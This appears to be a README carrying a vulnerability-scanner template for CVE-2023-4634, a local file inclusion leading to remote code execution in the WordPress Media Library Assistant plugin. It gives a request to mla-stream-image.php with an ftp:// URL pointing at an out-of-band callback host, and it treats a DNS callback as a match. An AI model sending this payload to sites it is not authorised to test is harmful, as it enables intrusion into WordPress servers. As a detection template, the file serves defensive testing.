README.md
Rendering markdown...
id: CVE-2023-4634
info:
name: Local File inclusion leading wich could lead to RCE in media-library-assistant
author: Pepitoh(Patrowl)
severity: critical
description: A vulnerability in the Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.
reference:
- https://fr.wordpress.org/plugins/media-library-assistant/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-4634
tags: cve,cve2023,wordpress
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"